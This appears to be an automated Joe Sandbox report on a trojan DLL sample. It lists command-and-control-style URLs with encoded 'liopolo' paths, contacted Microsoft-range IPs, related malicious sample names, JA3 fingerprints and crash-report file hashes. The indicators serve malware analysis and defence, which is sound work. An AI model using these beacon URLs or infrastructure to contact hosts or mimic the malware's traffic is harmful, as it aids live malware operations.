                                                                                    https://outlook.office365.com/&/loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://ogp.me/ns#loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.504622760.0000000003329000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Frloaddll32.exe, 00000002.00000003.590802963.0000000000CD4000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwrundll32.exe, 00000006.00000003.668405116.0000000003688000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.624862887.0000000003690000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://breuranel.website/liopolo/QA56VbJ0mf8IO/bu7B6hDH/DMBL8lGiGevOerWP3oEITXA/XSYJaQdf97/rSRSo5gwloaddll32.exe, 00000002.00000003.593466694.0000000000C84000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBloaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7Ctrundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_2loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.msn.com/?refurl=%2fmail%2fliopolo%2fVn4JvoFId6Cp3NLYZ%2fukfCWWcxchPj%2fqCUcA7g4p8o%2fIzqloaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcloaddll32.exe, 00000002.00000002.678292868.0000000000C70000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown

                                                                                                  Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  40.97.161.50
                                                                                                  		outlook.comUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  13.82.28.61
                                                                                                  		msn.comUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  52.98.207.210
                                                                                                  		HHN-efz.ms-acdc.office.comUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  40.101.60.226
                                                                                                  		unknownUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                  Analysis ID:500413
                                                                                                  Start date:12.10.2021
                                                                                                  Start time:00:47:57
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 10m 6s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:light
                                                                                                  Sample file name:616412739e268.dll
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Run name:Run with higher sleep bypass
                                                                                                  Number of analysed new started processes analysed:37
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal88.troj.evad.winDLL@14/12@15/5
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 16.7% (good quality ratio 16.1%)
                                                                                                  • Quality average: 79%
                                                                                                  • Quality standard deviation: 28.5%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 68%
                                                                                                  • Number of executed functions: 0
                                                                                                  • Number of non-executed functions: 0
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                  • Found application associated with file extension: .dll
                                                                                                  Warnings:
                                                                                                  Show All
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                  • TCP Packets have been reduced to 100
                                                                                                  • Excluded IPs from analysis (whitelisted): 93.184.221.240, 13.107.4.50, 20.199.120.151, 20.199.120.182, 20.199.120.85, 52.139.176.199, 204.79.197.203, 40.126.31.141, 40.126.31.6, 40.126.31.143, 20.190.159.138, 40.126.31.137, 20.190.159.132, 40.126.31.139, 20.190.159.134, 52.184.81.210, 20.42.73.29, 52.168.117.173, 20.189.173.22, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60
                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, b1ns.c-0001.c-msedge.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, onedsblobprdeus15.eastus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, b1ns.au-msedge.net, client.wns.windows.com, iris-de-prod-azsc-eas.eastasia.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, dub2.current.a.prd.aadg.trafficmanager.net, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  00:50:33API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                  00:50:38API Interceptor1x Sleep call for process: rundll32.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  40.97.161.50m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                    6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                      6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                          test1.dllGet hashmaliciousBrowse
                                                                                                            6.dllGet hashmaliciousBrowse
                                                                                                              6101135878f66.dllGet hashmaliciousBrowse
                                                                                                                a9FUs89dWy.dllGet hashmaliciousBrowse
                                                                                                                  609a460e94791.tiff.dllGet hashmaliciousBrowse
                                                                                                                    13fil.exeGet hashmaliciousBrowse
                                                                                                                      24messag.exeGet hashmaliciousBrowse
                                                                                                                        .exeGet hashmaliciousBrowse
                                                                                                                          .exeGet hashmaliciousBrowse
                                                                                                                            66documen.exeGet hashmaliciousBrowse
                                                                                                                              9messag.exeGet hashmaliciousBrowse
                                                                                                                                13.82.28.6145DOC00111738011537818635391-pdf.exeGet hashmaliciousBrowse
                                                                                                                                • msn.com/

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                outlook.comP2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                in7BcpKNoa.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                aXNdDIO708.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                vhPaw5lCuv.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                5sTWnI5RoC.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.0
                                                                                                                                57wF9hu0V5.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.0
                                                                                                                                7zxmUw3Ml1.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                Nh1UI4PFGW.exeGet hashmaliciousBrowse
                                                                                                                                • 52.101.24.0
                                                                                                                                rEYF2xcbGR.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.1
                                                                                                                                G2Shy4flZe.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.207.1

                                                                                                                                ASN

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUS616412739e268.dllGet hashmaliciousBrowse
                                                                                                                                • 52.97.183.162
                                                                                                                                m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                                • 40.101.60.226
                                                                                                                                m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                                • 52.97.151.66
                                                                                                                                6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                                • 13.82.28.61
                                                                                                                                6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                                • 13.82.28.61
                                                                                                                                B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                                • 13.82.28.61
                                                                                                                                B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                                • 52.97.183.162
                                                                                                                                P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                                • 40.93.212.0
                                                                                                                                b3astmode.x86Get hashmaliciousBrowse
                                                                                                                                • 72.154.237.78
                                                                                                                                b3astmode.arm7Get hashmaliciousBrowse
                                                                                                                                • 20.153.181.154
                                                                                                                                b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                                                                • 20.63.129.213
                                                                                                                                TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                                                                • 20.42.65.92
                                                                                                                                PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                                                                • 40.101.62.34
                                                                                                                                setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                • 52.168.117.173
                                                                                                                                ntpclientGet hashmaliciousBrowse
                                                                                                                                • 21.215.78.72
                                                                                                                                2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                                                                • 13.92.100.208
                                                                                                                                K6E9636KoqGet hashmaliciousBrowse
                                                                                                                                • 159.27.209.248
                                                                                                                                setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                • 20.42.73.29
                                                                                                                                Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                                • 104.47.53.36
                                                                                                                                mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                                                                • 20.189.173.22

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                ce5f3254611a8c095a3d821d44539877616412739e268.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                aVFOmbW2t7.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                gxJ83rJkgw.msiGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                yR4AxlwcWJ.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                BsyK7FB5DQ.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                SGfGZT66wD.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                XK1PLPuwjL.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                SecuriteInfo.com.W32.AIDetect.malware2.24481.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                vH0SHswvrb.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                NM0NyvZi8O.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226
                                                                                                                                yOTzv1Qz0n.exeGet hashmaliciousBrowse
                                                                                                                                • 40.97.161.50
                                                                                                                                • 13.82.28.61
                                                                                                                                • 52.98.207.210
                                                                                                                                • 40.101.60.226

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_134e49f4\Report.wer
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11922
                                                                                                                                Entropy (8bit):3.7581261502125924
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:TFs6iG0oXWHygBWjed+x/u7sMS274ItWcq:y6igXOygBWje8/u7sMX4ItWcq
                                                                                                                                MD5:393A3C31649BD29973306D0F85A32BCC
                                                                                                                                SHA1:FF3907D20E074D3DA8B205FD00E430C7AC757B8B
                                                                                                                                SHA-256:3474F1F823B321D214E319FB6DCEE5DAE41798381419B3FFFA520BFD4908C3F0
                                                                                                                                SHA-512:1636C709A088992524FA1E9420BBFC1DB3C81D98987D259ABE8829A5620958742106A588D897A76F6042E454A393EECF27E1A6889124E852D4AFBA478685F43E
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.8.6.5.3.5.5.5.3.2.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.8.6.6.0.7.7.4.0.5.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.e.7.5.6.7.5.-.6.b.b.d.-.4.7.c.d.-.9.5.5.3.-.f.9.0.7.1.d.a.6.9.a.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.f.4.4.f.1.0.-.0.1.c.d.-.4.7.6.e.-.a.1.1.1.-.3.b.f.a.4.d.4.7.6.2.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.7.c.-.0.0.0.1.-.0.0.1.c.-.9.9.d.9.-.0.f.a.3.3.d.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_120258ba\Report.wer
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12042
                                                                                                                                Entropy (8bit):3.764569090051945
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:WYiJ0oX1HBUZMX4jed+x/u7sMS274It7c5:1inXlBUZMX4je8/u7sMX4It7c5
                                                                                                                                MD5:3F8355DAD9CF57B7376FA2D5C6AD95EE
                                                                                                                                SHA1:CB52C465F96C0A0AF69590C43FBDDB918D2A7E9E
                                                                                                                                SHA-256:4F5DC83FE9F23AE55485CF812B54AEEC15BF2D0103BEB805F7D6F96ED6E8EBBE
                                                                                                                                SHA-512:AD507D613D8012026CCEEF32126498B7BD0AD69A3344748BD5CF594B297EB5FAE922D63E7C9DEE8A92639FEF111B20F223D7ACA1419A33797EAFBA5820ED8360
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.8.6.5.6.8.1.2.0.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.8.6.6.7.0.6.2.0.1.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.9.a.f.8.5.3.-.9.4.1.4.-.4.3.1.b.-.9.4.8.0.-.5.b.c.4.a.b.e.1.c.2.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.4.a.3.0.0.2.-.0.4.f.b.-.4.5.2.0.-.b.5.c.d.-.2.5.6.8.0.7.f.d.5.a.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.0.8.-.0.0.0.1.-.0.0.1.c.-.0.6.f.a.-.7.6.a.5.3.d.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_16ee2ecb\Report.wer
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12042
                                                                                                                                Entropy (8bit):3.763578802257413
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Nyc0iA0oX1HBUZMX4jed+5/u7sMS274It7cl:X0iWXlBUZMX4jeU/u7sMX4It7cl
                                                                                                                                MD5:AB66B0C65430D7784DCE9F3BFD18E012
                                                                                                                                SHA1:AE58C3155D963E5024E45440CFB891E9BD61DB13
                                                                                                                                SHA-256:0D3F8A590A42953E0C4B0592B7331C6F080DEDF99C372F3AE4B8D0625DDB97B3
                                                                                                                                SHA-512:890813DF532F81B17C3A7F7B28A2038E88748D112CCD989CC3E82C09CFC34F5CACCE5034E508068BF9EC84B8839F9A47DA42FF3B137CCD20C2D93A5F8AA3FA9B
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.8.6.4.8.2.3.0.3.7.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.8.6.5.5.5.7.4.0.3.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.7.9.1.5.7.f.-.4.b.e.0.-.4.4.7.8.-.9.9.d.2.-.f.4.2.a.e.7.9.c.a.0.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.d.a.2.c.f.7.-.b.8.d.e.-.4.1.f.0.-.9.e.4.2.-.e.0.3.c.d.6.9.a.8.8.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.c.4.-.0.0.0.1.-.0.0.1.c.-.2.d.7.4.-.1.0.a.1.3.d.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1549.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8406
                                                                                                                                Entropy (8bit):3.698743070989418
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNi3jd6W6YVD96dgmf8NSMCprC89bnwUWsfStm:RrlsNiTd6W6YJ96dgmf8NSvnwU1fB
                                                                                                                                MD5:843C76288B5B86E920CBDAFDF7178B67
                                                                                                                                SHA1:014D8DDC43C2CFC67BBBF093D60C71A800068F55
                                                                                                                                SHA-256:C169356D757A52AEAEDA71E531886B3481BEA92953B9B11A01F7D5D07A934A5A
                                                                                                                                SHA-512:F168C58370610308E24B530BD778B881D87665AE5EC988219D2A89A03BAFACD53CB51268AD250FC8B24F67DADEEE2EBE855FDF3C62923FC6C6FD5EA3D0DF3378
                                                                                                                                Malicious:false
